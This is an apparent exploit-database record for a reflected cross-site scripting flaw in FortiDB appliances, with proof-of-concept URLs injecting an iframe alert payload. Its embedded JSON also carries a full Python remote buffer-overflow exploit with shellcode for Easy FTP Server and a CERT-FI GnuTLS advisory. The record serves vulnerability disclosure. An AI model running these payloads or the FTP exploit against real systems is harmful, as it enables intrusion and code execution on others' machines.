FortiGate FortiDB 2kB 1kC / 400B Cross Site Scripting
2012-10-31T00:00:00
ID 1337DAY-ID-19873 Type zdt Reporter n/a Modified 2012-10-31T00:00:00
Description
FortiGate FortiDB 2kB 1kC and 400B suffer from a cross site scripting vulnerability.
FortiGate FortiDB 2kB 1kC & 400B - Cross Site Vulnerability
Introduction:
=============
Targeting large enterprises the FortiDB-2000B appliance provides scalable database security and
compliance solution. Utilizing its flexible policy framework, the FortiDB-2000B allows quick and
easy implementation of internal IT control frameworks for database activity monitoring (DAM/DAA),
IT audit, and regulatory compliance.
Designed for mid-sized enterprises, the FortiDB-1000C appliance provides a comprehensive database
security and compliance solution. Through its web-based interface, the FortiDB-1000C centrally
monitors, audits and scans multiple distributed, heterogeneous databases. This ensures consistent
database security policies across the organization without imposing high management burdens on your
database admin and IT staff.
The FortiDB-400B appliance provides a cost effective database security and compliance solution for
small to mid-size enterprises in a quick to implement, easy to manage package. It scans databases
for vulnerabilities, monitors, and audits databases activities, and generates compliance reports.
Its intuitive web-based interface ensures ease of configuration, minimizing the management burden
on your database administrators and IT staff.
(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortidb )
Cross Site Scripting Vulnerability in FortiGates FortiDB 2kB 1kC & 400B.
Affected Products:
==================
Fortigate
Product: FortiDB - Database Security Appliance v2000B; 1000C & 400B
Details:
========
A non-persistent input validation vulnerability is detected in FortiGates FortiDB Appliance 2000B 1000C & 400B.
The vulnerability allows remote attackers to implement/inject malicious script code on the application side (persistent).
The vulnerability is located in the Java Number Format Exception Handling module with the bound vulnerable output listing.
The bug is on application side & the execution is non-persistent out of the object exception-handling web application
appliance context. Exploitation requires low or medium user inter action. Successful exploitation of the vulnerability can
lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
Vulnerable Module(s):
[+] Java Number Format Exception Handling
Affected Function(s):
[+] (Output) Listing
Proof of Concept:
=================
The vulnerability can be exploited by remote attacker with medium or high required user inter action. For demonstration or reproduce ...
Review: Java Number Format Exception-Handling - Listing [Output] Error
<pre class="errorExceptionCause">java.lang.NumberFormatException:
For input string: ""><[NON PERSISTENT SCRIPT CODE!]")' <"="" at="" java.lang.numberformatexception.
forinputstring(numberformatexception.java:48)="" java.lang.long.parselong(long.java:410)=""
org.apache.myfaces.orchestra.conversation.conversationmanager.findconversationcontextid(conversationmanager.java:157)=""
org.apache.myfaces.orchestra.conversation.conversationmanager.getcurrentrootconversationcontext(conversationmanager.java:564)=""
org.apache.myfaces.orchestra.lib.jsf.contextlockrequesthandler.init(contextlockrequesthandler.java:87)=""
org.apache.myfaces.orchestra.lib.jsf.orchestrafacescontextfactory$1.<init="">
(OrchestraFacesContextFactory.java:119)
at ...
PoC:
http://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/targetsMonitorView.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vascan/globalsummary.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vaerrorlog/vaErrorLog.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/database/listTargetGroups.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/sysconfig/listSystemInfo.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
Solution:
=========
The vulnerability can be prevented by parsing the java number format exception output listing & mkey application value.
2012-10-24: Vendor Fix/Patch
Risk:
=====
The security risk of the non-persistent cross site scripting vulnerability is estimated as medium(-).
# 0day.today [2018-01-10] #
{"published": "2012-10-31T00:00:00", "id": "1337DAY-ID-19873", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:33:39", "bulletin": {"published": "2012-10-31T00:00:00", "id": "1337DAY-ID-19873", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.1, "modified": "2016-04-20T01:33:39"}}, "hash": "fa0620e0d35f3d1603f85c3c1d14bde6c581e7f292e122c74c6b4252b47660da", "description": "FortiGate FortiDB 2kB 1kC and 400B suffer from a cross site scripting vulnerability.", "type": "zdt", "lastseen": "2016-04-20T01:33:39", "edition": 1, "title": "FortiGate FortiDB 2kB 1kC / 400B Cross Site Scripting", "href": "http://0day.today/exploit/description/19873", "modified": "2012-10-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/19873", "references": [], "reporter": "n/a", "sourceData": "FortiGate FortiDB 2kB 1kC & 400B - Cross Site Vulnerability\r\n\r\nIntroduction:\r\n=============\r\nTargeting large enterprises the FortiDB-2000B appliance provides scalable database security and \r\ncompliance solution. Utilizing its flexible policy framework, the FortiDB-2000B allows quick and \r\neasy implementation of internal IT control frameworks for database activity monitoring (DAM/DAA), \r\nIT audit, and regulatory compliance.\r\n\r\nDesigned for mid-sized enterprises, the FortiDB-1000C appliance provides a comprehensive database \r\nsecurity and compliance solution. Through its web-based interface, the FortiDB-1000C centrally \r\nmonitors, audits and scans multiple distributed, heterogeneous databases. This ensures consistent \r\ndatabase security policies across the organization without imposing high management burdens on your \r\ndatabase admin and IT staff. \r\n\r\nThe FortiDB-400B appliance provides a cost effective database security and compliance solution for \r\nsmall to mid-size enterprises in a quick to implement, easy to manage package. It scans databases \r\nfor vulnerabilities, monitors, and audits databases activities, and generates compliance reports. \r\nIts intuitive web-based interface ensures ease of configuration, minimizing the management burden \r\non your database administrators and IT staff.\r\n\r\n(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortidb )\r\n\r\n\r\nCross Site Scripting Vulnerability in FortiGates FortiDB 2kB 1kC & 400B.\r\n\r\nAffected Products:\r\n==================\r\nFortigate\r\nProduct: FortiDB - Database Security Appliance v2000B; 1000C & 400B\r\n\r\nDetails:\r\n========\r\nA non-persistent input validation vulnerability is detected in FortiGates FortiDB Appliance 2000B 1000C & 400B. \r\nThe vulnerability allows remote attackers to implement/inject malicious script code on the application side (persistent). \r\nThe vulnerability is located in the Java Number Format Exception Handling module with the bound vulnerable output listing. \r\nThe bug is on application side & the execution is non-persistent out of the object exception-handling web application \r\nappliance context. Exploitation requires low or medium user inter action. Successful exploitation of the vulnerability can \r\nlead to session hijacking (manager/admin) or stable (persistent) context manipulation. \r\n\r\nVulnerable Module(s):\r\n [+] Java Number Format Exception Handling\r\n\r\nAffected Function(s):\r\n [+] (Output) Listing\r\n\r\n\r\nProof of Concept:\r\n=================\r\nThe vulnerability can be exploited by remote attacker with medium or high required user inter action. For demonstration or reproduce ...\r\n\r\nReview: Java Number Format Exception-Handling - Listing [Output] Error\r\n\r\n<pre class=\"errorExceptionCause\">java.lang.NumberFormatException: \r\nFor input string: \"\"><[NON PERSISTENT SCRIPT CODE!]\")' <\"=\"\" at=\"\" java.lang.numberformatexception.\r\nforinputstring(numberformatexception.java:48)=\"\" java.lang.long.parselong(long.java:410)=\"\" \r\norg.apache.myfaces.orchestra.conversation.conversationmanager.findconversationcontextid(conversationmanager.java:157)=\"\" \r\norg.apache.myfaces.orchestra.conversation.conversationmanager.getcurrentrootconversationcontext(conversationmanager.java:564)=\"\" \r\norg.apache.myfaces.orchestra.lib.jsf.contextlockrequesthandler.init(contextlockrequesthandler.java:87)=\"\" \r\norg.apache.myfaces.orchestra.lib.jsf.orchestrafacescontextfactory$1.<init=\"\">\r\n(OrchestraFacesContextFactory.java:119)\r\nat ...\r\n\r\n\r\nPoC:\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/targetsMonitorView.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vascan/globalsummary.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vaerrorlog/vaErrorLog.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/database/listTargetGroups.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/sysconfig/listSystemInfo.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\n\r\n\r\nSolution:\r\n=========\r\nThe vulnerability can be prevented by parsing the java number format exception output listing & mkey application value.\r\n\r\n2012-10-24: Vendor Fix/Patch\r\n\r\n\r\nRisk:\r\n=====\r\nThe security risk of the non-persistent cross site scripting vulnerability is estimated as medium(-).\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "274b68192b056e268f128ff63bfcd4a4", "key": "reporter"}, {"hash": "3a3885fa4599a1689e815d78994cdd57", "key": "modified"}, {"hash": "3a3885fa4599a1689e815d78994cdd57", "key": "published"}, {"hash": "db9ad6f05877c09efa37eef3151bbf74", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "067d9a320946edc5b1aef4eb4e893ac2", "key": "href"}, {"hash": "77c9bc521da88a256a4504f504bdc8c8", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b3eb90685a8b4fca6b1a5be6f18c1d25", "key": "title"}, {"hash": "b421e3db642ea72f118665a58eb2b822", "key": "description"}], "objectVersion": "1.0"}}], "description": "FortiGate FortiDB 2kB 1kC and 400B suffer from a cross site scripting vulnerability.", "hash": "76e66b63e58132267edc98d59d36ff61c63e0b8dec44ea1c5efd56d23d0a85e7", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2018-01-10T17:34:22"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9010", "SECURITYVULNS:DOC:13642"]}], "modified": "2018-01-10T17:34:22"}, "vulnersScore": 0.6}, "type": "zdt", "lastseen": "2018-01-10T17:34:22", "edition": 2, "title": "FortiGate FortiDB 2kB 1kC / 400B Cross Site Scripting", "href": "https://0day.today/exploit/description/19873", "modified": "2012-10-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/19873", "references": [], "reporter": "n/a", "sourceData": "FortiGate FortiDB 2kB 1kC & 400B - Cross Site Vulnerability\r\n\r\nIntroduction:\r\n=============\r\nTargeting large enterprises the FortiDB-2000B appliance provides scalable database security and \r\ncompliance solution. Utilizing its flexible policy framework, the FortiDB-2000B allows quick and \r\neasy implementation of internal IT control frameworks for database activity monitoring (DAM/DAA), \r\nIT audit, and regulatory compliance.\r\n\r\nDesigned for mid-sized enterprises, the FortiDB-1000C appliance provides a comprehensive database \r\nsecurity and compliance solution. Through its web-based interface, the FortiDB-1000C centrally \r\nmonitors, audits and scans multiple distributed, heterogeneous databases. This ensures consistent \r\ndatabase security policies across the organization without imposing high management burdens on your \r\ndatabase admin and IT staff. \r\n\r\nThe FortiDB-400B appliance provides a cost effective database security and compliance solution for \r\nsmall to mid-size enterprises in a quick to implement, easy to manage package. It scans databases \r\nfor vulnerabilities, monitors, and audits databases activities, and generates compliance reports. \r\nIts intuitive web-based interface ensures ease of configuration, minimizing the management burden \r\non your database administrators and IT staff.\r\n\r\n(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortidb )\r\n\r\n\r\nCross Site Scripting Vulnerability in FortiGates FortiDB 2kB 1kC & 400B.\r\n\r\nAffected Products:\r\n==================\r\nFortigate\r\nProduct: FortiDB - Database Security Appliance v2000B; 1000C & 400B\r\n\r\nDetails:\r\n========\r\nA non-persistent input validation vulnerability is detected in FortiGates FortiDB Appliance 2000B 1000C & 400B. \r\nThe vulnerability allows remote attackers to implement/inject malicious script code on the application side (persistent). \r\nThe vulnerability is located in the Java Number Format Exception Handling module with the bound vulnerable output listing. \r\nThe bug is on application side & the execution is non-persistent out of the object exception-handling web application \r\nappliance context. Exploitation requires low or medium user inter action. Successful exploitation of the vulnerability can \r\nlead to session hijacking (manager/admin) or stable (persistent) context manipulation. \r\n\r\nVulnerable Module(s):\r\n [+] Java Number Format Exception Handling\r\n\r\nAffected Function(s):\r\n [+] (Output) Listing\r\n\r\n\r\nProof of Concept:\r\n=================\r\nThe vulnerability can be exploited by remote attacker with medium or high required user inter action. For demonstration or reproduce ...\r\n\r\nReview: Java Number Format Exception-Handling - Listing [Output] Error\r\n\r\n<pre class=\"errorExceptionCause\">java.lang.NumberFormatException: \r\nFor input string: \"\"><[NON PERSISTENT SCRIPT CODE!]\")' <\"=\"\" at=\"\" java.lang.numberformatexception.\r\nforinputstring(numberformatexception.java:48)=\"\" java.lang.long.parselong(long.java:410)=\"\" \r\norg.apache.myfaces.orchestra.conversation.conversationmanager.findconversationcontextid(conversationmanager.java:157)=\"\" \r\norg.apache.myfaces.orchestra.conversation.conversationmanager.getcurrentrootconversationcontext(conversationmanager.java:564)=\"\" \r\norg.apache.myfaces.orchestra.lib.jsf.contextlockrequesthandler.init(contextlockrequesthandler.java:87)=\"\" \r\norg.apache.myfaces.orchestra.lib.jsf.orchestrafacescontextfactory$1.<init=\"\">\r\n(OrchestraFacesContextFactory.java:119)\r\nat ...\r\n\r\n\r\nPoC:\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/targetsMonitorView.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vascan/globalsummary.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vaerrorlog/vaErrorLog.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/database/listTargetGroups.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/sysconfig/listSystemInfo.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\n\r\n\r\nSolution:\r\n=========\r\nThe vulnerability can be prevented by parsing the java number format exception output listing & mkey application value.\r\n\r\n2012-10-24: Vendor Fix/Patch\r\n\r\n\r\nRisk:\r\n=====\r\nThe security risk of the non-persistent cross site scripting vulnerability is estimated as medium(-).\n\n# 0day.today [2018-01-10] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b421e3db642ea72f118665a58eb2b822", "key": "description"}, {"hash": "ac586e71d37d1163000b1abb48b6ad56", "key": "href"}, {"hash": "3a3885fa4599a1689e815d78994cdd57", "key": "modified"}, {"hash": "3a3885fa4599a1689e815d78994cdd57", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "274b68192b056e268f128ff63bfcd4a4", "key": "reporter"}, {"hash": "e1fbfe6b219703dfccf15ee442ebb46c", "key": "sourceData"}, {"hash": "b9847cf20b1bd67b5914cfa768cc690f", "key": "sourceHref"}, {"hash": "b3eb90685a8b4fca6b1a5be6f18c1d25", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-04-14T03:45:42", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2010-08-10T00:00:00", "published": "2010-08-10T00:00:00", "id": "1337DAY-ID-13642", "href": "https://0day.today/exploit/description/13642", "type": "zdt", "title": "EASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR, SIZE, XCWD", "sourceData": "======================================================================\r\nEASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR, SIZE, XCWD\r\n======================================================================\r\n\r\n# Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands Remote Buffer Overflow Exploit\r\n# Date: 10/8/2010\r\n# Author: Rabih Mohsen\r\n# Software Link:http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip\r\n# Version: 1.7.0.11\r\n# Tested on: Windows XP SP3\r\n# CVE:\r\n \r\nimport socket\r\nimport sys\r\n \r\nbuffersize = 272\r\n \r\n# Buffer needed -> 272 bytes\r\n# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars \\x00\\x0a\\x2f\\x5c ]\r\n \r\nshellcode = (\"\\xda\\xc0\\xd9\\x74\\x24\\xf4\\xbb\\xe6\\x9a\\xc9\\x6d\\x5a\\x33\\xc9\\xb1\"\r\n\"\\x33\\x31\\x5a\\x18\\x83\\xea\\xfc\\x03\\x5a\\xf2\\x78\\x3c\\x91\\x12\\xf5\"\r\n\"\\xbf\\x6a\\xe2\\x66\\x49\\x8f\\xd3\\xb4\\x2d\\xdb\\x41\\x09\\x25\\x89\\x69\"\r\n\"\\xe2\\x6b\\x3a\\xfa\\x86\\xa3\\x4d\\x4b\\x2c\\x92\\x60\\x4c\\x80\\x1a\\x2e\"\r\n\"\\x8e\\x82\\xe6\\x2d\\xc2\\x64\\xd6\\xfd\\x17\\x64\\x1f\\xe3\\xd7\\x34\\xc8\"\r\n\"\\x6f\\x45\\xa9\\x7d\\x2d\\x55\\xc8\\x51\\x39\\xe5\\xb2\\xd4\\xfe\\x91\\x08\"\r\n\"\\xd6\\x2e\\x09\\x06\\x90\\xd6\\x22\\x40\\x01\\xe6\\xe7\\x92\\x7d\\xa1\\x8c\"\r\n\"\\x61\\xf5\\x30\\x44\\xb8\\xf6\\x02\\xa8\\x17\\xc9\\xaa\\x25\\x69\\x0d\\x0c\"\r\n\"\\xd5\\x1c\\x65\\x6e\\x68\\x27\\xbe\\x0c\\xb6\\xa2\\x23\\xb6\\x3d\\x14\\x80\"\r\n\"\\x46\\x92\\xc3\\x43\\x44\\x5f\\x87\\x0c\\x49\\x5e\\x44\\x27\\x75\\xeb\\x6b\"\r\n\"\\xe8\\xff\\xaf\\x4f\\x2c\\x5b\\x74\\xf1\\x75\\x01\\xdb\\x0e\\x65\\xed\\x84\"\r\n\"\\xaa\\xed\\x1c\\xd1\\xcd\\xaf\\x4a\\x24\\x5f\\xca\\x32\\x26\\x5f\\xd5\\x14\"\r\n\"\\x4e\\x6e\\x5e\\xfb\\x09\\x6f\\xb5\\xbf\\xe5\\x25\\x94\\x96\\x6d\\xe0\\x4c\"\r\n\"\\xab\\xf0\\x13\\xbb\\xe8\\x0c\\x90\\x4e\\x91\\xeb\\x88\\x3a\\x94\\xb0\\x0e\"\r\n\"\\xd6\\xe4\\xa9\\xfa\\xd8\\x5b\\xca\\x2e\\xbb\\x3a\\x58\\xb2\\x12\\xd8\\xd8\"\r\n\"\\x51\\x6b\\x28\")\r\n \r\neip = \"\\x91\\xC8\\x41\\x7E\" # CALL EDI - user32.dll\r\nnopsled = \"\\x90\" * 16\r\n \r\npayload = \"\\x90\" * (buffersize-(len(nopsled)+len(shellcode)))\r\n \r\n# target, CMDS: anny of the \"NLST , NLST -al, APPE, RETR , SIZE and XCWD\"\r\ndef GenericEasyFTPExploit(target, CMDS):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n connect = s.connect((target, 21))\r\n s.recv(1024)\r\n s.send('User anonymous\\r\\n')\r\n s.recv(1024)\r\n s.send('PASS anonymous\\r\\n')\r\n s.send(CMDS +nopsled+shellcode+payload+eip+'\\r\\n')\r\n s.recv(1024)\r\n s.send('QUIT EASY ftp\\r\\n')\r\n s.close()\r\n \r\ntarget = sys.argv[1]\r\nCMDS = sys.argv[2]\r\n \r\nGenericEasyFTPExploit(target,CMDS)\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13642"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "CERT-FI Vulnerability Advisory on GnuTLS\r\n\r\nVersion Information\r\n\r\nAdvisory Reference FICORA #130447\r\nRelease Date 19 May 2008 12:00 UTC\r\nLast Revision 19 May 2008\r\nVersion Number 1.0\r\n\r\nAcknowledgement\r\n\r\nVulnerabilities were discovered by Ossi Herrala and Jukka Taimisto from the CROSS project\r\nat Codenomicon Ltd., and reported directly to the vendor through CERT-FI.\r\n\r\nWhat is Affected?\r\n\r\nThe vulnerabilities described in this advisory affect GnuTLS prior to version 2.2.4.\r\n\r\nImpact\r\n\r\nThe impact from vulnerabilities can expose Denial-of-Service (DoS) and buffer overflow\r\nconditions. It may even be possible for an attacker to execute code on the affected system.\r\n\r\nSummary\r\n\r\nThree programming errors leading to segmentation fault were found in the gnutls-serv\r\nprogram, triggered by the following TLS messages:\r\n\r\n1. Sending TLS record containing multiple Client Hello handshake messages.\r\n2. Sending TLS 1.0 Client Hello message which contains specifically crafted server name extension.\r\n3. Doing complete TLS 1.0 handshake followed by a encrypted Client-Hello message with a Record Length of 8.\r\n\r\nDetails\r\n\r\n1. The problem occurs when gnutls-serv receives TLS message which contains multiple Client Hello\r\nmessages. The program reads the first Client Hello and then proceeds to send Server Hello,\r\nCertificate, Certificate Request and Server Hello Done messages. After sending these, it apperently\r\nreads next Client Hello from the message sent earlier and crashes to segmentation fault caused by\r\na NULL pointer.\r\n\r\nThe error occurs when _gnutls_recv_client_kx_message() (in lib/gnutls_kx.c) is called. This function\r\ncalls _gnutls_recv_handshake() which in turn reads the next Client Hello packet and ends up\r\nreturning 0 and sets the data pointer to NULL. _gnutls_recv_client_kx_message() does not check\r\nthe variable data for NULL before calling the key exchange handling function, in this case\r\n_gnutls_proc_rsa_client_kx() (in lib/auth_rsa.c). _gnutls_proc_rsa_client_kx() function does not\r\ncheck the data pointer for NULL and proceeds to call _gnutls_read_uint16() with a NULL pointer,\r\ncausing a segmentation fault.\r\n\r\n2. The problem occurs when gnutls-serv receives Client Hello message which contains Server\r\nname extension where the length of the server name list is set to 18 and the data of the Server\r\nSame list consists of 18 zero octets. After receiving this Client Hello message gnutls-serv continues\r\nto function normally, but crashes after Finished messages when it tries to pack the session data in\r\nthe function pack_security_parameters() (in lib/gnutls_session_pack.c).\r\n\r\nHowever the bug causing the crash is in the extension handling, in\r\n_gnutls_server_name_recv_params() (lib/ext_server_name.c). The function tries to calculate the\r\nnumber of Server Names in the packet (lines 70-80), but does not check if the length of Server\r\nName is 0. This causes the function to interpret the 18 zero octets as containing 6 Server Names.\r\nThe more serious bug follows when, on line 83, the number of server names is saved to\r\nsession->security_parameters.extensions.server_names_size. Then the number of Server Sames\r\nis checked against the maximum number of Server Names supported (3) but the value saved to\r\nthe struct is never corrected. Hence after the extensions are interpreted, the\r\nsession->security_parameters.extensions.server_names_size contains the illegal value 6.\r\n\r\nThis causes the crash later on when in pack_security_parameters() the\r\nsession->security_parameters.extensions.server_names_size is used in the loop where the\r\nServer Names are copied (gnutls_session_pack.c, lines 1074 - 1090). Since there is only space\r\nfor 3 Server Names, the loop iterates well over the boundary and results in a segmentation fault.\r\n\r\n3. The problem occurs in function _gnutls_ciphertext2compressed() (in lib/gnutls_cipher.c). The\r\nparameter ciphertext contains the start of the received message in ciphertext.data and the\r\nciphertext.size contains value 8 (taken from the Record Length field of the received TLS record).\r\n\r\nNow, since block cipher is being used, after the 8 bytes of data has been decrypted the\r\n_gnutls_ciphertext2compressed() proceeds to read the length of the padding bytes in line 505:\r\n\r\npad = ciphertext.data[ciphertext.size - 1] + 1; /* pad */\r\n\r\nSince the ciphertext.size is 8, the pad byte is read from the Random field in the Client Hello\r\nmessage (as stated in the introduction, the flaw was found by sending encrypted Client Hello\r\nmessage in a TLS Record containig invalid Record Length field) and contains value 0xf0\r\n(240 in decimal) and the pad variable is set to 241.\r\n\r\nIn line 507, the length of the data is calculated:\r\n\r\nlength = ciphertext.size - hash_size - pad;\r\n\r\nSince, pad is 241, hash_size 20 (SHA1 is used) and ciphertext.size is 8, the length is set\r\nto a negative value. This is not checked immediately.\r\n\r\nIn line 509, a check is made to make sure padding length is not invalid:\r\n\r\nif (pad > ciphertext.size - hash_size)\r\n\r\nDue the data types used in the comparison (pad is uin8_t, ciphertext.size is unsigned int and\r\nhash_size is int) the invalid pad length is not catched by this check, instead the comparison is\r\nfalse leaving the pad_failed to value 0 and the execution proceeds to the next statement in\r\nline 520. The check in line 520 passes and the program proceeds to do the padding check.\r\nThe for loop:\r\n\r\nfor (i = 2; i < pad; i++)\r\n{\r\nif (ciphertext.data[ciphertext.size - i] !=\r\nciphertext.data[ciphertext.size - 1])\r\npad_failed = GNUTLS_E_DECRYPTION_FAILED;\r\n}\r\n\r\nloops the i from 2 to 241, resulting in a segmentation fault.\r\n\r\nSolution\r\n\r\nPatch the affected software with the patches supplied by the vendor.\r\n\r\nVendor Statements\r\n\r\nGnuTLS\r\n\r\nThe issue is covered in the advisory SA-2008-01.\r\n\r\nCredits\r\n\r\nCERT-FI would like to thank Codenomicon for providing the vulnerability information and Simon Josefsson of GnuTLS for his co-operation.\r\n\r\nContact Information\r\n\r\nCERT-FI Vulnerability Coordination can be contacted as follows:\r\n\r\nEmail:\r\nvulncoord@ficora.fi\r\nPlease quote the advisory reference in the subject line\r\n\r\nTelephone:\r\n+358 9 6966 510\r\nMonday - Friday 08:00 - 16:15 (EET: UTC+2)\r\n\r\nFax :\r\n+358 9 6966 515\r\n\r\nPost:\r\nVulnerability Coordination\r\nFICORA/CERT-FI\r\nP.O. Box 313\r\nFI-00181 Helsinki\r\nFINLAND\r\n\r\nCERT-FI encourages those who wish to communicate via email to make use of our PGP key. The key is available at https://www.cert.fi/en/activities/contact/pgp-keys.html", "modified": "2008-05-20T00:00:00", "published": "2008-05-20T00:00:00", "id": "SECURITYVULNS:DOC:19873", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19873", "title": "CERT-FI Vulnerability Advisory on GnuTLS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "description": "Frevulnerabilities on TLS traffic parsing lead to DoS conditions and potential buffer overflow.", "modified": "2008-05-20T00:00:00", "published": "2008-05-20T00:00:00", "id": "SECURITYVULNS:VULN:9010", "href": 